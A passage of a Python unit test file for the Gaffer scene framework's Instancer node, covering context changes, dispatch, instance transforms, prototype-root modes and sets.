traverseConnection = Gaffer.ScopedConnection( GafferSceneTest.connectTraverseSceneToContextChangedSignal( script["instancer"]["out"], context ) )
with context :
context.setFrame( 10 )
context.setFramesPerSecond( 50 )
context.setTime( 1 )
context.set( "a", 1 )
context.set( "a", 2.0 )
context.set( "a", "a" )
context.set( "a", imath.V2i() )
context.set( "a", imath.V3i() )
context.set( "a", imath.V2f() )
context.set( "a", imath.V3f() )
context.set( "a", imath.Color3f() )
context.set( "a", IECore.BoolData( True ) )
context["b"] = 1
context["b"] = 2.0
context["b"] = "b"
context["b"] = imath.V2i()
context["b"] = imath.V3i()
context["b"] = imath.V2f()
context["b"] = imath.V3f()
context["b"] = imath.Color3f()
context["b"] = IECore.BoolData( True )
with Gaffer.BlockedConnection( traverseConnection ) :
# Must add it with the connection disabled, otherwise
# the addition causes a traversal, and then remove() gets
# all its results from the cache.
context["minRadius"] = 0.2
context.remove( "minRadius" )
with Gaffer.BlockedConnection( traverseConnection ) :
context["minRadius"] = 0.3
del context["minRadius"]
def testDispatchAndGIL( self ) :
script = Gaffer.ScriptNode()
script["plane"] = GafferScene.Plane()
script["plane"]["divisions"].setValue( imath.V2i( 20 ) )
script["sphere"] = GafferScene.Sphere()
script["expression"] = Gaffer.Expression()
script["expression"].setExpression( "parent['sphere']['radius'] = context.get( 'minRadius', 0.1 ) + context.getFrame()" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["plane"]["out"] )
script["instancer"]["prototypes"].setInput( script["sphere"]["out"] )
script["instancer"]["parent"].setValue( "/plane" )
script["pythonCommand"] = GafferDispatch.PythonCommand()
script["pythonCommand"]["command"].setValue( "pass" )
traverseConnection = Gaffer.ScopedConnection( GafferSceneTest.connectTraverseSceneToPreDispatchSignal( script["instancer"]["out"] ) )
dispatcher = GafferDispatch.LocalDispatcher()
dispatcher["jobsDirectory"].setValue( self.temporaryDirectory() )
with Gaffer.Context() as c :
for i in range( 1, 10 ) :
c.setFrame( i )
dispatcher.dispatch( [ script["pythonCommand"] ] )
def testTransform( self ) :
point = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( 4, 0, 0 ) ] ) )
point["orientation"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.QuatfVectorData( [ imath.Quatf().setAxisAngle( imath.V3f( 0, 1, 0 ), math.pi / 2.0 ) ] )
)
point["scale"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.V3fVectorData( [ imath.V3f( 2, 3, 4 ) ] )
)
point["uniformScale"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.FloatVectorData( [ 10 ] )
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( point )
sphere = GafferScene.Sphere()
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/object" )
self.assertEqual( instancer["out"].transform( "/object/instances/sphere/0" ), imath.M44f().translate( imath.V3f( 4, 0, 0 ) ) )
instancer["orientation"].setValue( "orientation" )
self.assertTrue(
imath.V3f( 4, 0, -1 ).equalWithAbsError(
imath.V3f( 1, 0, 0 ) * instancer["out"].transform( "/object/instances/sphere/0" ),
0.00001
)
)
instancer["scale"].setValue( "scale" )
self.assertTrue(
imath.V3f( 4, 0, -2 ).equalWithAbsError(
imath.V3f( 1, 0, 0 ) * instancer["out"].transform( "/object/instances/sphere/0" ),
0.00001
)
)
instancer["scale"].setValue( "uniformScale" )
self.assertTrue(
imath.V3f( 4, 0, -10 ).equalWithAbsError(
imath.V3f( 1, 0, 0 ) * instancer["out"].transform( "/object/instances/sphere/0" ),
0.00001
)
)
def testIndexedRootsListWithEmptyList( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 4 ) ] ) )
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 1, 1, 0 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
cube = GafferScene.Cube()
instances = GafferScene.Parent()
instances["in"].setInput( sphere["out"] )
instances["children"][0].setInput( cube["out"] )
instances["parent"].setValue( "/" )
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( instances["out"] )
instancer["parent"].setValue( "/object" )
instancer["prototypeIndex"].setValue( "index" )
self.assertEqual( instancer["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "sphere", "cube" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/0" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/sphere/3" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/1" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].childNames( "/object/instances/cube/2" ), IECore.InternedStringVectorData() )
self.assertEqual( instancer["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/cube" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/0" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/sphere/3" ), sphere["out"].object( "/sphere" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/1" ), cube["out"].object( "/cube" ) )
self.assertEqual( instancer["out"].object( "/object/instances/cube/2" ), cube["out"].object( "/cube" ) )
self.assertSceneValid( instancer["out"] )
def buildPrototypeRootsScript( self ) :
# we don't strictly require a script, but its the easiest way to
# maintain references to all the nodes for use in client tests.
script = Gaffer.ScriptNode()
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 4 ) ] ) )
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 1, 1, 0 ] ),
)
# for use with RootPerVertex mode
points["root"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.StringVectorData( [ "/foo", "/bar" ] ),
IECore.IntVectorData( [ 0, 1, 1, 0 ] ),
)
script["objectToScene"] = GafferScene.ObjectToScene()
script["objectToScene"]["object"].setValue( points )
# for use with IndexedRootsVariable mode
script["variables"] = GafferScene.PrimitiveVariables()
script["variables"]["primitiveVariables"].addChild(
Gaffer.NameValuePlug(
"prototypeRoots",
Gaffer.StringVectorDataPlug( "value", defaultValue = IECore.StringVectorData( [ ] ), flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ),
True,
"prototypeRoots",
Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic
)
)
script["variables"]["primitiveVariables"]["prototypeRoots"]["name"].setValue( 'prototypeRoots' )
script["variables"]["in"].setInput( script["objectToScene"]["out"] )
script["filter"] = GafferScene.PathFilter()
script["filter"]["paths"].setValue( IECore.StringVectorData( [ "/object" ] ) )
script["variables"]["filter"].setInput( script["filter"]["out"] )
# /foo/bar/sphere
script["sphere"] = GafferScene.Sphere()
script["group"] = GafferScene.Group()
script["group"]["name"].setValue( "bar" )
script["group"]["in"][0].setInput( script["sphere"]["out"] )
script["group2"] = GafferScene.Group()
script["group2"]["name"].setValue( "foo" )
script["group2"]["in"][0].setInput( script["group"]["out"] )
# /bar/baz/cube
script["cube"] = GafferScene.Cube()
script["group3"] = GafferScene.Group()
script["group3"]["name"].setValue( "baz" )
script["group3"]["in"][0].setInput( script["cube"]["out"] )
script["group4"] = GafferScene.Group()
script["group4"]["name"].setValue( "bar" )
script["group4"]["in"][0].setInput( script["group3"]["out"] )
script["prototypes"] = GafferScene.Parent()
script["prototypes"]["in"].setInput( script["group2"]["out"] )
script["prototypes"]["children"][0].setInput( script["group4"]["out"] )
script["prototypes"]["parent"].setValue( "/" )
script["instancer"] = GafferScene.Instancer()
script["instancer"]["in"].setInput( script["variables"]["out"] )
script["instancer"]["prototypes"].setInput( script["prototypes"]["out"] )
script["instancer"]["parent"].setValue( "/object" )
script["instancer"]["prototypeIndex"].setValue( "index" )
return script
def assertRootsMatchPrototypeSceneChildren( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "foo", "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertUnderspecifiedRoots( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
def assertSingleRoot( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "foo" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo" ), IECore.InternedStringVectorData( [ "0", "1", "2", "3" ] ) )
for i in [ "0", "1", "2", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertConflictingRootNames( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "bar", "bar1" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar1" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar1" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}/sphere".format( i=i ) ), IECore.InternedStringVectorData( [] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar1/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar1/{i}/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar1/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar1/{i}/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar1/{i}/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertSwappedRoots( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "bar", "foo" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/foo/{i}/bar/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertSkippedRoots( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar" ), IECore.NullObject.defaultNullObject() )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/bar/{i}/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertRootsToLeaves( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "sphere", "cube" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/sphere" ), IECore.InternedStringVectorData( [ "0", "3" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/cube" ), IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/sphere" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/cube" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/sphere/{i}".format( i=i ) ), IECore.InternedStringVectorData( [] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/sphere/{i}".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
for i in [ "1", "2" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/cube/{i}".format( i=i ) ), IECore.InternedStringVectorData( [] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/cube/{i}".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
self.assertSceneValid( script["instancer"]["out"] )
def assertRootsToRoot( self, script ) :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances" ), IECore.InternedStringVectorData( [ "root" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root" ), IECore.InternedStringVectorData( [ "0", "1", "2", "3" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances" ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root" ), IECore.NullObject.defaultNullObject() )
for i in [ "0", "1", "2", "3" ] :
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}".format( i=i ) ), IECore.InternedStringVectorData( [ "foo", "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}/foo".format( i=i ) ), IECore.InternedStringVectorData( [ "bar" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}/foo/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "sphere" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}/bar".format( i=i ) ), IECore.InternedStringVectorData( [ "baz" ] ) )
self.assertEqual( script["instancer"]["out"].childNames( "/object/instances/root/{i}/bar/baz".format( i=i ) ), IECore.InternedStringVectorData( [ "cube" ] ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/foo".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/foo/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/foo/bar/sphere".format( i=i ) ), script["sphere"]["out"].object( "/sphere" ) )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/bar".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/bar/baz".format( i=i ) ), IECore.NullObject.defaultNullObject() )
self.assertEqual( script["instancer"]["out"].object( "/object/instances/root/{i}/bar/baz/cube".format( i=i ) ), script["cube"]["out"].object( "/cube" ) )
def testIndexedRootsList( self ) :
script = self.buildPrototypeRootsScript()
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsList )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [] ) )
self.assertRootsMatchPrototypeSceneChildren( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "", ] ) )
self.assertUnderspecifiedRoots( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo", ] ) )
self.assertSingleRoot( script )
# roots list matching the prototype root children
# we expect the same results as without a roots list
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo", "/bar" ] ) )
self.assertRootsMatchPrototypeSceneChildren( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ) )
self.assertConflictingRootNames( script )
# opposite order to the prototype root children
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/bar", "/foo" ] ) )
self.assertSwappedRoots( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "", "/bar" ] ) )
self.assertSkippedRoots( script )
# roots all the way to the leaf level of the prototype scene
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo/bar/sphere", "/bar/baz/cube" ] ) )
self.assertRootsToLeaves( script )
# we can specify the root of the prototype scene
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/" ] ) )
self.assertRootsToRoot( script )
script["instancer"]["prototypeRootsList"].setValue( IECore.StringVectorData( [ "/foo", "/does/not/exist" ] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, '.*Prototype root "/does/not/exist" does not exist.*',
script["instancer"]["out"].childNames, "/object/instances",
)
def testIndexedRootsVariable( self ) :
script = self.buildPrototypeRootsScript()
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.IndexedRootsVariable )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must specify at least one root location.*",
script["instancer"]["out"].childNames, "/object/instances",
)
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "", ] ) )
self.assertUnderspecifiedRoots( script )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo", ] ) )
self.assertSingleRoot( script )
# roots list matching the prototype root children
# we expect the same results as without a roots list
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo", "/bar" ] ) )
self.assertRootsMatchPrototypeSceneChildren( script )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ) )
self.assertConflictingRootNames( script )
# opposite order to the prototype root children
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/bar", "/foo" ] ) )
self.assertSwappedRoots( script )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "", "/bar" ] ) )
self.assertSkippedRoots( script )
# roots all the way to the leaf level of the prototype scene
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo/bar/sphere", "/bar/baz/cube" ] ) )
self.assertRootsToLeaves( script )
# we can specify the root of the prototype scene
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/" ] ) )
self.assertRootsToRoot( script )
script["variables"]["primitiveVariables"]["prototypeRoots"]["value"].setValue( IECore.StringVectorData( [ "/foo", "/does/not/exist" ] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, '.*Prototype root "/does/not/exist" does not exist.*',
script["instancer"]["out"].childNames, "/object/instances",
)
script["instancer"]["prototypeRoots"].setValue( "notAPrimVar" )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must be Constant StringVectorData when using IndexedRootsVariable mode.*does not exist.*",
script["instancer"]["out"].childNames, "/object/instances",
)
# the vertex primvar should fail
script["instancer"]["prototypeRoots"].setValue( "root" )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must be Constant StringVectorData when using IndexedRootsVariable mode.*",
script["instancer"]["out"].childNames, "/object/instances",
)
def testRootPerVertex( self ) :
script = self.buildPrototypeRootsScript()
script["instancer"]["prototypeMode"].setValue( GafferScene.Instancer.PrototypeMode.RootPerVertex )
script["instancer"]["prototypeRoots"].setValue( "root" )
def updateRoots( roots, indices ) :
points = script["objectToScene"]["object"].getValue()
points["root"] = IECoreScene.PrimitiveVariable( points["root"].interpolation, roots, indices )
script["objectToScene"]["object"].setValue( points )
updateRoots( IECore.StringVectorData( [] ), IECore.IntVectorData( [] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must specify at least one root location.*",
script["instancer"]["out"].childNames, "/object/instances",
)
updateRoots( IECore.StringVectorData( [ "", ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) )
self.assertUnderspecifiedRoots( script )
updateRoots( IECore.StringVectorData( [ "/foo", ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) )
self.assertSingleRoot( script )
# roots list matching the prototype root children
# we expect the same results as without a roots list
updateRoots( IECore.StringVectorData( [ "/foo", "/bar" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertRootsMatchPrototypeSceneChildren( script )
updateRoots( IECore.StringVectorData( [ "/foo/bar", "/bar" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertConflictingRootNames( script )
# opposite order to the prototype root children
updateRoots( IECore.StringVectorData( [ "/bar", "/foo" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertSwappedRoots( script )
updateRoots( IECore.StringVectorData( [ "", "/bar" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertSkippedRoots( script )
# roots all the way to the leaf level of the prototype scene
updateRoots( IECore.StringVectorData( [ "/foo/bar/sphere", "/bar/baz/cube" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
self.assertRootsToLeaves( script )
# we can specify the root of the prototype scene
updateRoots( IECore.StringVectorData( [ "/", ] ), IECore.IntVectorData( [ 0, 0, 0, 0 ] ) )
self.assertRootsToRoot( script )
updateRoots( IECore.StringVectorData( [ "/foo", "/does/not/exist" ] ), IECore.IntVectorData( [ 0, 1, 1, 0 ] ) )
six.assertRaisesRegex( self,
Gaffer.ProcessException, '.*Prototype root "/does/not/exist" does not exist.*',
script["instancer"]["out"].childNames, "/object/instances",
)
script["instancer"]["prototypeRoots"].setValue( "notAPrimVar" )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must be Vertex StringVectorData when using RootPerVertex mode.*does not exist.*",
script["instancer"]["out"].childNames, "/object/instances",
)
# the constant primvar should fail
script["instancer"]["prototypeRoots"].setValue( "prototypeRoots" )
six.assertRaisesRegex( self,
Gaffer.ProcessException, ".*must be Vertex StringVectorData when using RootPerVertex mode.*",
script["instancer"]["out"].childNames, "/object/instances",
)
def testSets( self ) :
points = IECoreScene.PointsPrimitive( IECore.V3fVectorData( [ imath.V3f( x, 0, 0 ) for x in range( 0, 4 ) ] ) )
points["index"] = IECoreScene.PrimitiveVariable(
IECoreScene.PrimitiveVariable.Interpolation.Vertex,
IECore.IntVectorData( [ 0, 1, 1, 0 ] ),
)
objectToScene = GafferScene.ObjectToScene()
objectToScene["object"].setValue( points )
sphere = GafferScene.Sphere()
sphere["sets"].setValue( "sphereSet" )
cube = GafferScene.Cube()
cube["sets"].setValue( "cubeSet" )
cubeGroup = GafferScene.Group()
cubeGroup["name"].setValue( "cubeGroup" )
cubeGroup["in"][0].setInput( cube["out"] )
instances = GafferScene.Parent()
instances["in"].setInput( sphere["out"] )
instances["children"][0].setInput( cubeGroup["out"] )
instances["parent"].setValue( "/" )
instancer = GafferScene.Instancer()
instancer["in"].setInput( objectToScene["out"] )
instancer["prototypes"].setInput( instances["out"] )
instancer["parent"].setValue( "/object" )
instancer["prototypeIndex"].setValue( "index" )
self.assertEqual(
instancer["out"]["setNames"].getValue(),
IECore.InternedStringVectorData( [ "sphereSet", "cubeSet" ] )
)
self.assertEqual(
set( instancer["out"].set( "sphereSet" ).value.paths() ),
{
"/object/instances/sphere/0",
